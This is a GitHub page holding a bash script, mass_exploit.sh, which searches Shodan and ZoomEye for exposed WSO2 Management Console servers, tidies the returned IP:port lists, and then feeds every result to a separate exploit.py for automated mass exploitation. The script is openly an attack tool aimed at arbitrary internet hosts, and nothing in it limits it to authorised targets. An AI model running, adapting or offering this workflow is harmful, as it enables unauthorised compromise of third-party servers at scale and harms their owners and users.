-
Notifications
You must be signed in to change notification settings - Fork 9
/
mass_exploit.sh
executable file
·123 lines (122 loc) · 4.25 KB
/
mass_exploit.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
#!/bin/bash
CURRENT=`date +%F-%H_%M`
CURRENTNOW=`date +%F`
LINE=`wc zoom_results.txt | awk '{print $1}'`
echo -e "[*] Need to install Shodan and ZoomEye? Enter to skip or type yes/y [*]"
read SETUP
if [ "$SETUP" = "yes" ]; then
sudo apt-get install python-setuptools -y
sudo apt-get install pip -y
pip install git+https://github.com/knownsec/ZoomEye-python.git
pip install shodan
elif [ "$SETUP" = "y" ]; then
sudo apt-get install python-setuptools -y
sudo apt-get install pip -y
pip install shodan
pip install git+https://github.com/knownsec/ZoomEye-python.git
else
echo "[*] OK Skipping! [*]"
fi
echo -e "[*] Starting at $CURRENT [*]"
echo "[*] Have you already setup your Shodan API Key? Type no or enter to skip [*]"
read INIT
if [ "$INIT" = "no" ]; then
echo "[*] Please paste your API Key from: https://account.shodan.io/ [*]"
read API
APIK=${#API}
if [ "$APIK" = "32" ]; then
shodan init $API
else
echo "[*] Invalid API Token [*]"
exit;
fi
elif [ "$INIT" = "y" ]; then
echo "[*] Ok going ahead..Init skip [*]"
else
echo "[*] Ok going ahead..Init skip [*]"
fi
echo "[*] Have you already setup your Zoomeye API Key? Type no or enter to skip [*]"
read INITZoom
if [ "$INITZoom" = "no" ]; then
echo "[*] Please paste your API Key from: https://www.zoomeye.org/profile [*]"
read APIZ
APIKZ=${#APIZ}
if [ "$APIKZ" = "37" ]; then
zoomeye --init $APIZ
else
echo "[*] Invalid API Token [*]"
exit;
fi
elif [ "$INIT" = "y" ]; then
echo "[*] Ok going ahead..Init skip [*]"
else
echo "[*] Ok going ahead..Init skip [*]"
fi
echo "[*] Ready to Search [*]"
echo "[*] Do you want proceed to scan with shodan? type no to quit[*]"
read SCAN
if [ "$SCAN" = "no" ]; then
echo "[*] Ok bye! [*]"
else
echo "[*] Renaming last results to results_shodan.txt.old"
mv results_shodan.txt results_shodan.txt.old
echo "[*] How many results? Suggested 200. If more probably JSON will fuck your ass. [*]"
read TH
shodan search 'title:"WSO2 Management Console"' --fields ip_str,port --limit $TH --separator ":" >> results_shodan.txt
sed -i 's/443:/443/g' results_shodan.txt
echo "[*] Results saved in results_shodan.txt [*]"
fi
echo "[*] Do you want to proceed to scan with zoomeye? type no to quit [*]"
read SCAN2
if [ "$SCAN2" = "no" ]; then
echo "[*] Ok bye! [*]"
else
echo "[*] Renaming last results to zoom_results.txt.old"
mv zoom_results.txt zoom_results.txt.old
echo -e "[*] Starting Zoomeye! [*]"
echo -e "[*] How many results? Suggested is not more than 300. Up to you.[*]"
read TH2
zoomeye search 'title:"WSO2 Management Console"' -num $TH2 -filter=ip,port >> zoom_results.txt
sed -i '1d' zoom_results.txt
echo "[*] Manipulating 1 and $LINE [*]"
LINEA=`sed -i "${LINE}d" zoom_results.txt`
sed -i 's/ /:/g' zoom_results.txt
sed -i 's/: 443:/:443/g' zoom_results.txt
sed -i 's/: 443:/:443/g' zoom_results.txt
sed -i 's/: 443:/:443/g' zoom_results.txt
sed -i 's/:443:/:443/g' zoom_results.txt
sed -i 's/ 443/443/g' zoom_results.txt
sed -i 's/443:/443/g' zoom_results.txt
sed -i 's/ 443/:443/g' zoom_results.txt
sed -i 's/: 80:/:80/g' zoom_results.txt
sed -i 's/: 80:/:80/g' zoom_results.txt
sed -i 's/: 80:/:80/g' zoom_results.txt
sed -i 's/:80:/:80/g' zoom_results.txt
sed -i 's/80:/80/g' zoom_results.txt
sed -i 's/ 80:/:80/g' zoom_results.txt
sed -i 's/ 9443:/:9443/g' zoom_results.txt
sed -i 's/: 9443:/:9443/g' zoom_results.txt
sed -i 's/: 9443:/:9443/g' zoom_results.txt
sed -i 's/ 9443/:9443/g' zoom_results.txt
sed -i 's/ 9443/9443/g' zoom_results.txt
sed -i 's/ 80/:80/g' zoom_results.txt
sed -i 's/ 9443/9443/g' zoom_results.txt
sed -i 's/ 9443/9443/g' zoom_results.txt
sed -i 's/ 9443/9443/g' zoom_results.txt
LINEA=`sed -i 's/ total $TH2/ /g' zoom_results.txt`
fi
echo "[*] Do you want to exploit the results? [*]"
read EXPLOIT
if [ "$EXPLOIT" = "yes" ]; then
echo "ok"
python3 exploit.py -f results_shodan.txt
python3 exploit.py -f zoom_results.txt
elif [ "$EXPLOIT" = "y" ]; then
echo "Starting!"
python3 exploit.py -f results_shodan.txt
python3 exploit.py -f zoom_results.txt
else
echo "Ok Bye!"
exit;
fi
echo "[*] $CURRENT Seems we've done! [*]"